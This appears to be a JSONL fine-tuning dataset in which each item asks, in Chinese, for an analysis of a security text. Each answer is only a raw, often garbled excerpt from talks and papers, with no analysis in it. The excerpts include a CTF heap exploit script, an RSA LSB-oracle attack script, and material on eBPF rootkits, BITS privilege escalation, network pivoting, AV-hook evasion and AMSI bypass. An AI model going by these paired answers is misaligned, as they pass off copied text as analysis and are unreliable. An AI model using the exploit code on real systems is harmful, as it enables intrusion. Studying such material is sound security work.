{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXCTF WP Author:Nu1L XCTF WP PWN cpp qemuzz GAME Reverse divination Web mine1_1 mine2 pyer webshell_1 hids PWN cpp UAFlibcfree_hook from pwn import * # s = process(\"./chall\") s = remote(\"124.70.12.210\",\"10002\") def add(idx,buf): s.sendlineafter(\"> \",str(0)) s.sendafter(\"> \",buf) s.sendlineafter(\"> \",str(idx)) def edit(idx): s.sendlineafter(\"> \",str(1)) s.sendlineafter(\"> \",str(idx)) for i in range(0x40): add(i,'\\n') context.terminal = ['notiterm', '-t', 'iterm', '-e'] edit(0) qemuzz s.send(\"\\n\") edit(1) s.recvuntil(\"> \") heap = u64(s.recvline(keepends=False).ljust(8,'\\x00'))-0x11eb0 success(hex(heap)) s.send(p64(heap+0x11f28)[:-2]+\"\\n\") add(0x40,'\\n') add(0x41,'\\x01\\x05\\n') edit(4) libc = ELF(\"./libc-2.31.so\") libc.address = u64(s.recvuntil(\"\\x7f\")[-6:]+\"\\x00\\x00\")-0x1ebbe0 success(hex(libc.address)) s.send(p64(libc.address+0x1ebbe0)[:-2]+\"\\n\") free_hook = libc.sym['__free_hook'] system = libc.sym['system'] # gdb.attach(s,\"b *$rebase(0x13c6)\\nc\") edit(0x11) s.send(\"\\n\") edit(0x10) s.send(p64(free_hook)[:-2]+\"\\n\") add(0xa0,'sh\\n') add(0xa1,p64(system)[:-2]+\"\\n\") add(0xa2,p64(system)[:-2]+\"\\n\") edit(0xa0) s.interactive() #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <string.h> #include <errno.h> #include <signal.h> #include <fcntl.h> #include <ctype.h> #include <termios.h> #include <sys/types.h> #include <sys/mman.h> #include <assert.h> #define PRINT_ERROR \\ do \\ { \\ fprintf(stderr, \"Error at line %d, file %s (%d) [%s]\\n\", \\ __LINE__, __FILE__, errno, strerror(errno)); \\ exit(1); \\ } while (0) int mmio_fd = -1; uint8_t *mmio_base = NULL; int mmio_size = 0x1000; void die(char *msg) { puts(msg); exit(1); } void init_mmio() { mmio_fd = open(\"/sys/devices/pci0000:00/0000:00:04.0/resource0\", O_RDWR | O_SYNC); if (mmio_fd < 0) { die(\"open mmio_fd\"); } mmio_base = (uint8_t *)mmap(0, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0); if (mmio_base == MAP_FAILED) { die(\"mmap mmio_base\"); } printf(\"mmio_base: %p\\n\", mmio_base); ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nM A N N I N G Dominik Picheta www.allitebooks.com Nim Reference Common constructs const x = 5 Compile-time constant let y = Hello Immutable binding var z = [1, 2, 3] Mutable variable proc name(param: int): ReturnType = body method name(param: float): ReturnType = body iterator items(list: seq[int]): int = body template name(param: typed) = body macro name(param: string): untyped = body if x > 5: body elif y == \"Hello\": body else: body case x of 5: body of 1, 2, 3: body of 6..30: body for item in list: body for i in 0..<len(list): body while x == 5: if y.len > 0: break else: continue try: raise err except Exception as exc: echo(exc.msg) finally: discard Input/Output echo(x, 42, \"text\") readFile(\"file.txt\") stdout.write(\"text\") writeFile(\"file.txt\", \"contents\") stderr.write(\"error\") open(\"file.txt\", fmAppend) stdin.readLine() Type definitions type MyType = object field: int type Colors = enum Red, Green, Blue, Purple type MyRef = ref object field*: string Licensed to <null> www.allitebooks.com Nim in Action Licensed to <null> www.allitebooks.com Licensed to <null> www.allitebooks.com Nim in Action DOMINIK PICHETA M A N N I N G SHELTER ISLAND Licensed to <null> www.allitebooks.com For online information and ordering of this and other Manning books, please visit www.manning.com. The publisher offers discounts on this book when ordered in quantity. For more information, please contact Special Sales Department Manning Publications Co. 20 Baldwin Road PO Box 761 Shelter Island, NY 11964 Email: orders@manning.com 2017 by Manning Publications Co. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by means electronic, mechanical, photocopying, or otherwise, without prior written permission of the publisher. Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in the book, and Manning Publications was aware", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\neBPF, I thought we were friends ! Guillaume Fournier Sylvain Afchain August 2021 Defcon 2021 2 About us Guillaume Fournier Security Engineer guillaume.fournier@datadoghq.com Sylvain Afchain Staff Engineer sylvain.afchain@datadoghq.com Sylvain Baubeau Staff Engineer & Team lead sylvain.baubeau@datadoghq.com  Cloud Workload Security Team  Leverage eBPF to detect attacks at runtime  Integrated in the Datadog Agent 3 Agenda  Introduction to eBPF  Abusing eBPF to build a rootkit  Obfuscation  Persistent access  Command and Control  Data exfiltration  Network discovery  RASP evasion  Detection and mitigation strategies Defcon 2021 4 Introduction to eBPF Defcon 2021 5 Introduction to eBPF  Extended Berkeley Packet Filter  Sandboxed programs in the Linux kernel  Initially designed for fast packet processing  Use cases:  Kernel performance tracing  Network security and observability  Runtime security  etc What is eBPF ? Falco Tracee Defcon 2021 6 Introduction to eBPF Step 1: Loading eBPF programs Defcon 2021 7 Introduction to eBPF Step 2: Attaching eBPF programs  Defines how a program should be triggered  ~ 30 program types (Kernel 5.13+)  Depends on the program type  BPF_PROG_TYPE_KPROBE  BPF_PROG_TYPE_TRACEPOINT  BPF_PROG_TYPE_SCHED_CLS  BPF_PROG_TYPE_XDP  etc  Programs of different types can share the same eBPF maps perf_event_open syscall Dedicated Netlink command Defcon 2021 8 Introduction to eBPF eBPF internals: the verifier The eBPF verifier ensures that eBPF programs will finish and wont crash.  Directed Acyclic Graph  No unchecked dereferences  No unreachable code  Limited stack size (512 bytes)  Program size limit (1 million on 5.2+ kernels)  Bounded loops (5.2+ kernels)   and cryptic output ... Defcon 2021 9 Introduction to eBPF eBPF internals: eBPF helpers  Context helpers  bpf_get_current_task  bpf_get_current_pid_tgid  bpf_ktime_get_ns  etc  Map helpers  bpf_map_lookup_elem  bpf_map_delete_elem  etc  Program type specific helpers  bpf_xdp_adjust_tail  bpf_csum_dif", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCloud Security in Map/Reduce An Analysis July 31, 2009 Jason Schlesinger ropyrusk@gmail.com Presentation Overview Contents: 1. Define Cloud Computing 2. Introduce and Describe Map/Reduce 3. Introduce Hadoop 4. Introduce Security Issues with Hadoop 5. Discuss Possible Solutions and Workarounds 6. Final Thoughts Goals: Raise awareness of Hadoop and its potential Raise awareness of existing security issues in Hadoop Inspire present and future Hadoop users and administrators to be aware of security in their Hadoop installation Defining Cloud Computing Distributed across multiple machines that are linked together either through the Internet, or across an internal network Fault tolerant to hardware failure, which is inevitable to happen in a large cluster scenario Applications are abstracted from the OS (more or less) Often used to offload tasks from user systems that would be unreasonable to run, or unfavorable to maintain. Considering the above: Hadoop is an incarnation of Map/Reduce in a Cloud environment. Map/Reduce: What It Is Map/Reduce is for huge data sets that have to be indexed, categorized, sorted, culled, analyzed, etc. It can take a very long time to look through each record or file in a serial environment. Map/Reduce allows data to be distributed across a large cluster, and can distribute out tasks across the data set to work on pieces of it independantly, and in parallel. This allows big data to be processed in relatively little time. Funfact: Google implemented and uses a proprietary Map/Reduce platform. Apache has produced an open source Map/Reduce platform called Hadoop Laundromat analogy of Map/Reduce Imagine that your data is laundry. You wash this laundry by similar colors. Then you dry this laundry by similar material (denims, towels, panties, etc.) Serial Operation: You now have clean laundry! (Time Elapsed: 2-3 hrs) Laundromat analogy of Map/Reduce Map/Reduce operation: You now have clean laundry! (Time elapsed: 1.25 hrs.) Word Count example of Map", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# LSB Oracle (crypto 150) ###ENG [PL](#pl-version) The task was pretty much the same idea as https://github.com/p4-team/ctf/tree/master/2016-04-15-plaid-ctf/crypto_rabit with the exception that in Plaid CTF we had Rabin cryptosystem and there it was RSA. We get a [binary](lsb_oracle.vmp.exe.zip) which can give us RSA public key and also it can tell us LSB of decrypted ciphertext. We also get an encrypted flag. We approach it the same was as for Rabit on Plaid CTF - we can multiply plaintext by 2 if we multiply ciphertext by `pow(2,e,n)`. This is because: ``` ct = pte mod n ct' = ct * 2e mod n = pte mod n * 2e mod n = 2pte mod n ct'd = (2pte mod n)d mod n = 2pted mod n = 2pt mod n ``` LSB from oracle tells us if the plaintext is even or odd. Modulus `n` is a product of 2 large primes, so it has to be odd. `2*x` has to be even. This means that if LSB of `2*x mod n` is 0 (number is still even) this number was smaller than modulus `n`. Otherwise the number was bigger than modulus. We can combine this using binary search approach to get upper and lower bounds of the flag in relation to `n`. We used a python script for this (slighly more accurate than the one in Rabbit, which was messing up last character): ```python from subprocess import Popen, PIPE from Crypto.Util.number import long_to_bytes def oracle(ciphertext): print(\"sent ciphertext \" + str(ciphertext)) p = Popen(['lsb_oracle.vmp.exe', '/decrypt'], stdout=PIPE, stdin=PIPE, stderr=PIPE) result = p.communicate(str(ciphertext) + \"\\n-1\") lsb = int(result[0][97]) print(lsb, result) return lsb def brute_flag(encrypted_flag, n, e, oracle_fun): flag_count = n_count = 1 flag_lower_bound = 0 flag_upper_bound = n ciphertext = encrypted_flag mult = 1 while flag_upper_bound > flag_lower_bound + 1: ciphertext = (ciphertext * pow(2, e, n)) % n flag_count *= 2 n_count = n_count * 2 - 1 print(\"upper = %d\" % flag_upper_bound) print(\"upper flag = %s\" % long_to_bytes(flag_upper_bound)) print(\"lower = %d\" % flag_lower_bound) print(\"l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBITSInject Using the BITS service to execute a program in the NT AUTHORITY/SYSTEM session. Summary BITS Background Details How We Got There - Research Flow First Naive Try Taking Inspiration From Windows Update Service (wuaueng) Imitating Wuaueng The State File is the Supervisor Interactive or not? Migrate your Payload A Cleaner Method A Little Anecdote Reproduction Instructions General Reproduction Description Step-by-step Reproduction instructions Affected Environment Details Summary We formed a logical manipulation on BITSs permissions validation model. As a local administrator, we were able to take almost full control of the BITS jobs queue, altering jobs properties and states, ultimately achieving program execution in the LocalSystem account (NT AUTHORITY/SYSTEM), within session 0. It does not involve creating a new service, nor modifying any of the OSs PE files. We introduce a new method in which a local administrator account can execute a program in the NT AUTHORITY/SYSTEM context. The method relies on BITS NotifyCmdLine option, by injecting a job to the service queue. Execution can be either interactive or not. 1 In this article, we would like to not only introduce the practical method, but also:  Present a detailed explanation of the binary structure of the BITS DB file (from now on, we will use the internal name - state file)  Share the knowledge we gathered while researching the service operation flow  Provide free giveaways:  A one-click python script that executes a program as LocalSystem using this new technique  A generic python script that injects any pre-produced job into the current queue  An 010 editor template file with the types and structs definitions, which can be used to parse BITS files.  SimpleBITSServer - a Python implementation of a BITS server, based on Pythons SimpleHTTPRequestHandler. 1An interactive program will dispatch the Interactive Services Detection message (forced by the UI0Detect service). BITS Background It is important to un", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMaltegos (Local) Partner in Crime Nadeem Douba | www.cygnos.com How you doin Nadeem Douba | www.cygnos.com 2 } Nadeem Douba  Work at Cygnos (http://www.cygnos.com) in Ottawa, ON, Canada  Certs: GWAPT, GPEN  Worked in the InfoSec field for 10+ years.  Love (European) football and hacking stuff } Been a Maltego fan-boy since the beginning... } Helped port/appify Maltego for Mac OS X J Nadeem Douba | www.sploitego.com 3 } What is Sploitego? } Maltego  Briefly Explained } Dive Into Development  Before Sploitego  After Sploitego } Demos } Conclusion } Questions Nadeem Douba | www.cygnos.com 4 } Local Transform Development Framework for Maltego written in Python } Provides:  Rapid transform development  Easy transform installation, management, and maintenance  Complementary scripts and modules for data mining and debugging  A whole bunch of cool transforms J Nadeem Douba | www.cygnos.com 5 } A little background on Maltego... Nadeem Douba | www.cygnos.com 6 Maltego Overview Nadeem Douba | www.cygnos.com 7 } Open Source Intelligence (OSInt) and forensics information mining/gathering and graphing tool } Developed by Paterva and PinkMatter Nadeem Douba | www.cygnos.com 8 } Information is represented on the graph as Entities } For example, an Entity could be:  Email Address  Image  Phone Number  Etc. } Each Entity has a value and optionally some fields. Nadeem Douba | www.cygnos.com 9 } Transforms reveal relationships between entities (or information) } Logic that mines and returns information (or Entities) using another piece of information (or Entity) as input  T(E0) à { E1, E2,  En } Nadeem Douba | www.cygnos.com 10 Just for Clarity Nadeem Douba | www.cygnos.com 11 } Two types of transforms:  Remote: runs on a remote Paterva or third-party Transform Server.  Local: runs on the users local machine.  This is where Sploitego comes in Nadeem Douba | www.cygnos.com 12 Pros Cons ü Patervas Transforms ü Awesome!!! ü Centralized Transform Management & Maintenance ü Implementation d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Fighting Fighting malware malware on your own on your own Vitaliy Kamlyuk Senior Virus Analyst Kaspersky Lab Vitaly.Kamluk@kaspersky.com DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Why fight malware on your own? Why fight malware on your own? 5 reasons: 1. Touch 100% of protection yourself 2. Be prepared for attacks 3. Maintain confidentiality 4. Restore system here and now 5. Time matters DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA What is available in What is available in W Windows indows XP? XP? System tools: Explorer, Task manager, Regedit, SigVerif, Console utils: netstat,tasklist,reg,expand Interpreters: Batch, JS/VBS Text editors: notepad,wordpad,edit,edlin, Binary editing tool: debug Symbolic debugger: ntsd OLE repository DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Email Email--Worm.Win32.Warezov Worm.Win32.Warezov Detected on 15th August, 2006 430 modifications (~25000 of files) All application data is encrypted Code mutates very often (server-side polymorphic engine) Downloads additional modules from the Internet Hides its modules from Task Manager DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Warezov: Infecting the system Warezov: Infecting the system DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Warezov: Installing KAV 6.0 Warezov: Installing KAV 6.0 DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Warezov: What really happened? Warezov: What really happened? DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Warezov: Inspecting the system Warezov: Inspecting the system DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Warezov: Manual removal Warezov: Manual removal DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Warezov: Resistance Warezov: Resistance to to manual manual removal removal DefCon 15 , August 3-5, 2007, Las Vegas, NV, USA Analysis Analysis 1. Malware restores registry values when the application terminates (seems to be when malicious dll is unloaded) 2. There is a set of pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPushing a Camel through the eye of the Needle! [Funneling Data in and out of Protected Networks] SensePost 2008 About:us  SensePost  Specialist Security firm based in South Africa;  Customers all over the globe;  Talks / Papers / Books  {marco,haroon}@sensepost.com  Spend most of our time breaking stuff ((thinking about breaking stuff) or playing foosball!)  What this talk is about ? (Hint: not foosball!) What this talk is about? A progression of Attacks  A brief trip to the past (1601-1990)  Un-firewalled access to victim host  And also un-firewalled to rest of the network! History (Continued.)  The Introduction of firewalls..  The failure to filter outbound traffic (circa 2000)  CommandExec.[asp|jsp|php|*] {The need for a comfortable Channel} History (Continued.)  Creating binaries on remote victim.  debug.exe and friends  upload.asp (and friends)  Win32 Port Binding (1998) Remote Exec (with feeling!)  We really needed to use the words AJAX and XMLHttpRequest object to qualify as a web 2.0 talk.  We will still add XML, SOAP and a tool with no vowels in its name (watch for this!) Time to pivot  This stuff is ancient history.  Sp_quickkill  Extreme nc usage  SensePost tcpr / Foundstonefport (Circa 2000) Client Pivot Target Start tcpr  XP and IPV6!  Ssh tunnel Listens on port 55555 Connects to pivot:55555 Pivot connects to target Proxied connection between client and target SSH Tunnels (a) Client Pivot Target Listens on port 22 Pivot runs sshd ssh L 55555:pivot:25 Proxied connection from Client to Target port Listens on port 55555 Listens on port 25 SSH Tunnels (b)  Instead lets look at R  So all we need is an ssh client on the remote machine, an SSHD on one of ours and we are in the game!  putty + plink FTW! Local machine Client is the Pivot Target Listens on port 22 ssh R 55555:localmachin e:445 Target runs sshd Listens on port 445 Proxy connection from target:55555 to local machine:445 Listens on port 55555 Interlude (dns2tcp)  Available from: http://www.hsc.fr/re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 P/Invoke和D/Invoke的区别 解释unmanaged code P/Invoke D/Invoke D/Invoke的些应 Interoperating with unmanaged code https://docs.microsoft.com/en-us/dotnet/framework/interop/ p/Invoke是项允许您从托管代码访问托管库中的结构回调和函数的技术 多数P/Invoke API包含在以下两个名称空间中 System System.Runtime.InteropServices 这两个名称空间为您提供了很多具帮助你便快捷地本机组件进通信 解释unmanaged code 1 .NET Framework促进了与COM组件COM+服务外部类型库和许多操作系统服务的交互 托管和托管对象模型之间的数据类型法签名和错误处理机制都不同 2 为了简化.NET Framework组件与托管代码之间的互操作并简化迁移路径公共语运 库对客户端和服务器隐藏了这些对象模型中的差异 3 4 在运时的控制下执的代码称为托管代码 5 相反在运时之外运的代码称为托管代码 6 COM组件ActiveX接和Windows API函数是托管代码的示例 P/Invoke 1 using System; 2 using System.Runtime.InteropServices; 3 4 public class Program 2 第9号P/Invoke作的关键它定义了种托管法该法具有与托管法完全相同的签名 该声明有个extern关键字它告诉Runtime这是个外部法并且在调它时让Runtime在 DllImportattribute中动寻找对应法调 在Mac上也可以但是调的就是mac上的的库 5 { 6 // Import user32.dll (containing the function we need) and de fine 7 // the method corresponding to the native function. 8 //加载托管的DLL 9 [DllImport(\"user32.dll\", CharSet = CharSet.Unicode, SetLastEr ror = true)] 10 11 private static extern int MessageBox(IntPtr hWnd, string lpTe xt, string lpCaption, uint uType); 12 13 public static void Main(string[] args) 14 { 15 // Invoke the function as a regular managed method. 16 MessageBox(IntPtr.Zero, \"Command-line message box\", \"Atte ntion!\", 0); 17 } 18 } 1 using System; 2 using System.Runtime.InteropServices; 3 4 namespace PInvokeSamples 5 { 6 public static class Program 7 { 8 // Import the libSystem shared library and define the met hod 9 // corresponding to the native function. 10 [DllImport(\"libSystem.dylib\")] 11 private static extern int getpid(); 12 13 public static void Main(string[] args) 3 D/Invoke全称是Dynamic Invocation出处应该是这Emulating Covert Operations - Dynamic Invocation (Avoiding PInvoke & API Hooks) 作就是避免被AV Hook被怀疑进恶意导 代码是在运时加载DLL使指向在内存中位置对的指针来调该函数不是使PInvoke直接静态 导API调我们可以从内存中调任意的托管代码同时可以传递参数并以反射式执 payload避免了导地址表出现恶意函数 详细介绍 https://thewover.github.io/Dynamic-Invoke/ 原理 https://blog.xpnsec.com/weird-ways-to-execute-dotnet/ https://github.com/cobbr/SharpSplo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n滲透測試 基本技巧與經驗分享 講者: 趙偉捷 自我介紹 ID : OAlienO 姓名 : 趙偉捷 學校系所 : 國立交通大學 電機資訊學士班 大二升大三 社群 : Bamboofox 目錄 滲透測試 - Penetration Test ( PT ) 情境一 : 收集情報 情境二 : 資料洩漏 情境三 : SQL injection 情境四 : XSS 情境五 : XST 情境六 : CSRF 情境七 : File Upload Vulnerability Common Vulnerabilities and Exposures ( CVE ) Bug Bounty 與漏洞通報 滲透測試 Penetration Test ( PT ) 滲透測試 - Penetration Test ( PT ) 簡介 : 滲透測試是企業委託駭客對系統進行入侵攻擊並在攻擊後 回報潛在漏洞給開發人員做修補 特性 : 以毒攻毒針對目標網站 有授權很重要 標準流程 很多人開始做滲透測試後就會有人整理一些常見的步驟手法這 邊列出幾個開源組織制定的滲透測試標準流程 OWASP ( Open Web Application Security Project ) https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_o f_Contents OSSTMM (Open Source Security Testing Methodology Manual) http://www.isecom.org/research/osstmm.html PTES ( Penetration Testing Execution Standard ) http://www.pentest- standard.org/index.php/PTES_Technical_Guidelines 標準流程 提升權限 維持存取 偵查 掃描 漏洞利用 回報漏洞 情境一 假設今天外星人想對某個網站做滲透測試 他要從哪裡開始測呢 ? ( 切他電路 ) 收集情報 收集情報 ( Information Gathering ) 最簡單且基本的情報收集可以從看伺服器回應的 http header 開始 收集情報 ( Information Gathering ) Cookie 的名字也可以拿來辨認系統 ( 不一定正確 ) 有沒有工具呢? Wappalyzer ( https://chrome.google.com/webstore/detail/wappalyzer/gp pongmhjkpfnbhagpmjfkannfbllamg?hl=zh-TW ) 收集情報 ( Information Gathering ) Chrome 插件 Wappalyzer 收集情報 - Google Hacking 完整的運用 Google 的強大搜尋功能 inurl: google.com inurl:google.com intext:\"PHP Fatal error: require()\" filetype:log site:google.com Google hacking database https://www.exploit-db.com/google-hacking-database/ 這裡不能有空白 收集情報  找旁注 一個機器可能 host 多個網站 收集情報 - 使用工具 ( nmap ) nmap <url> 掃 port 收集情報 - 使用工具 ( nikto ) 會提供相關網站 情境二 最常見安全問題 1st round  資料洩漏 情境 : 外星人在某網站上申請東東申請完後得到這個連結上面顯示申 請的資料做確認和列印會發生什麼事情呢請待下頁分曉 https://www.xxx.com/apply_form/?id=123 機敏資料洩漏 網站權限控管沒做好可以瀏覽其他人的申請單 並看到他填的申請表上面的個人資料 比如 : https://www.xxx.com/apply_form/?id=100 機敏資料洩漏 運用 Google hacking 的技巧找到不小心公開的檔案 intitle:\"Index of\" site:nctu.edu.tw filetype:pdf 情境三 最常見安全問題 2nd round  SQL injection 情境 : 外星人在某網站上看到可以輸入的 input box 就很開心地輸入單引號 SQL injection 發現驚人的事實他會 SQL syntax error 說明他 87% 有 SQL injection 漏洞 漏洞利用  SQL injection SQL injectio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass AMSI的前世今生(6) - .net和wmi完结 0x00 前言 这是这个系列完结篇了其实读完并跟随文章实际测试完前5篇对抗AMSI应该手到擒来了这一篇主 要分析下AMSI在.net和WMI中的应用以分析调用流程为主对抗方式为辅明白了原理在实际攻防 中灵活运用就行了 0x01 .Net如何调用AMSI 通过第一篇文章我们知道.net调用amsi.dll的文件是clr.dll 我们通过IDA静态分析找到相应的调用函数,如下是F5后的伪代码 C:\\Windows\\WinSxS\\amd64_netfx4- clr_dll_b03f5f7f11d50a3a_4.0.15805.360_none_395be0019a54e460\\clr.dll __int64 __fastcall sub_1805F7BE0(__int64 a1, unsigned int a2) { __int64 result; // rax __int64 v5; // rsi int v6; // ebx __int64 v7; // rdi HMODULE v8; // r14 __int64 v9; // [rsp+38h] [rbp-18h] BYREF int v10; // [rsp+40h] [rbp-10h] void *v11; // [rsp+48h] [rbp-8h] void *retaddr; // [rsp+78h] [rbp+28h] BYREF unsigned int v13; // [rsp+90h] [rbp+40h] BYREF __int64 v14; // [rsp+98h] [rbp+48h] BYREF result = (__int64)&retaddr; v5 = qword_180A19640; v9 = qword_180A19640; v6 = 0; v10 = 0; if ( qword_180A19640 ) { result = sub_180033588(qword_180A19640); v6 = 1; v10 = 1; } v7 = qword_180A33D40; if ( !qword_180A33D40 && byte_180A34740 == (_BYTE)qword_180A33D40 ) { result = sub_18015A744(); if ( (_DWORD)result && (result = LoadLibraryEx(L\"amsi.dll\", 0i64, 0x800u), (v8 = (HMODULE)result) != 0i64) && (result = (__int64)GetProcAddress((HMODULE)result, \"AmsiInitialize\"), (qword_180A33D30 = result) != 0) && (v14 = 0i64, result = ((__int64 (__fastcall *)(const wchar_t *, __int64 *))result) (L\"DotNet\", &v14), Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-20 No. 1 / 9 - Welcome to www.red-team.cn 这个代码如果看着不太明白我们可以直接阅读被复原的C代码来至https://modexp.wordpress. com/2019/06/03/disable-amsi-wldp-dotnet/到这儿不由感慨当我在阅读伪代码的时候为了搜索 其中一些错误嘛发现了这篇文章真的是前任栽树后人乘凉 !(_DWORD)result) ) { result = (__int64)GetProcAddress(v8, \"AmsiScanBuffer\"); qword_180A33D28 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD))result; v7 = qword_180A33D40; if ( result ) v7 = v14; qword_180A33D40 = v7; } else { v7 = qword_180A33D40; } byte_180A34740 = 1; } if ( v6 ) { result = sub_1800335D0(v5); v10 = 0; v7 = qword_180A33D40; } if ( v7 ) { result = ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-javaagent 参考文章 javaagent使用指南 Java Instrumentation javaagent 实例 Javaagent 是 java 命令的一个参数参数 javaagent 可以用于指定一个 jar 包并且对该 java 包有2个要求1这个 jar 包的 MANIFEST.MF 文件必须指定 Premain-Class 项2 Premain-Class 指定的那个类必须实现 premain() 方法 premain 方法从字面上理解就是 运行在 main 函数之前的的类当 Java 虚拟机启动时在执行 main 函数之前 JVM 会先运 行 -javaagent 所指定 jar 包内 Premain-Class 这个类的 premain 方法 在命令行输入 java 可以看到相应的参数其中有 和 java agent相关的 -agentlib:<libname>[=<选项>] 加载本机代理库 <libname>, 例如 -agentlib:hprof 另请参阅 -agentlib:jdwp=help 和 -agentlib:hprof=help -agentpath:<pathname>[=<选项>] 按完整路径名加载本机代理库 -javaagent:<jarpath>[=<选项>] 加载 Java 编程语言代理, 请参阅 java.lang.instrument agent 编写 MANIFREST.MF PreMainTraceAgent 此处需要注意的是自动打包的过程中自定义的 MANIFREST.MF 会被修改所以需要手动替换或 者是用maven打包并自定义打包插件 Manifest-Version: 1.0 Can-Redefine-Classes: true Can-Retransform-Classes: true Premain-Class: PreMainTraceAgent //此处是一个空行不可省略 import java.lang.instrument.ClassFileTransformer; import java.lang.instrument.IllegalClassFormatException; import java.lang.instrument.Instrumentation; import java.security.ProtectionDomain; public class PreMainTraceAgent { public static void premain(String agentArgs, Instrumentation inst){ System.out.println(\"agentArgs : \" + agentArgs); inst.addTransformer(new DefineTransformer(), true); } static class DefineTransformer implements ClassFileTransformer{ @Override public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException { System.out.println(\"premain load Class:\" + className); return classfileBuffer; } } } <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"> <parent> <artifactId>javaagent</artifactId> <groupId>org.example</groupId> <version>1.0-SNAPSHOT</version> </parent> <modelVersion>4.0.0</modelVersion> <artifactId>agentClass<", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF 微心得 ddaa Who am I  dada = ddaa = 0xddaa = 達達 != 大大  Start to play CTF since last year  One of the members in HITCON CTF team. 3 故事的開始是這樣的 大四跨校選課選修程式安全 http://wargame.cs.nctu.edu.tw Copyright 2012 SQlab 4 幹好難 (助教可以給更多 hint 嗎 T_T) 5 6 結果研究所不小心進了 SQLab 學長你們也有報名 HITCON  那當天就一起來打 wargame 吧 我......OAO  7 一題都沒解出來 T___T 可是拿到冠軍了學長們太強了 XD 8 一題都沒解出來 T___T 可是拿到冠軍了學長們太強了 XD 9 因為 CTF 很好玩 後來就一直玩一直玩一直玩 (?) 不過一開始都解不出來.... Before solving the problem After solving the problem 12 30C3CTF 2013 NUMBERS 100 guess 猜數字 破解偽隨機數生成器 Mersenne Twister http://ddaa.logdown.com/posts/171272-30c3ctf- numbers-100-guess 到現在還是覺得這題不該只值 100 分啊 Q___Q 第一個解出的 CTF 題目 13 30C3CTF 2013 NUMBERS 100 guess 猜數字 破解偽隨機數生成器 Mersenne Twister http://ddaa.logdown.com/posts/171272-30c3ctf- numbers-100-guess 到現在還是覺得這題不該只值 100 分啊 Q___Q 第一個解出的 CTF 題目 14 哇哦CTF 好有趣該如何入門呢 http://overthewire.org/wargames/ http://bright-shadows.net/ http://wargame.cs.nctu.edu.tw/ 15 1. 選一題你認為比較有趣 或是比較有可能解的題目 如果完全沒有頭緒得先 google 一些題目相關的背景知識 16 2. 努力看懂題目接著試著想出這題的解法 如果一時想不出來也可以跟別人討論看看 但別直接去找解答來看 >__< 17 3. 如果想法正確恭喜成功拿到 flag :D 將過程寫成 write up並且與其他人交流做法~ 18 4. 如果想法錯誤別氣餒想想其他的解法 可能會花上數小時甚至數天 但是在摸索的同時也會慢慢進步 19 5. 如果到最後還是想不出來 就看看其他人的 write up 吧 :P 照著做一遍真正弄懂這題的解法 下次遇到類似的題目就會做了 20 其實打 CTF 只需要... 興趣耐心求知慾 程式能力, 逆向工程, 密碼學, 演算法, 資訊隱藏, 鑑識分析, 滲透測試,  , etc 這些都可以慢慢學 XD The most important Never give up!!! 22 也可以參考台大或交大的課程網頁 https://csie.ctf.tw/ http://secprog.cs.nctu.edu.tw/ 工商時間 (誤)", "category": "text_analysis", "source": "security_papers"}
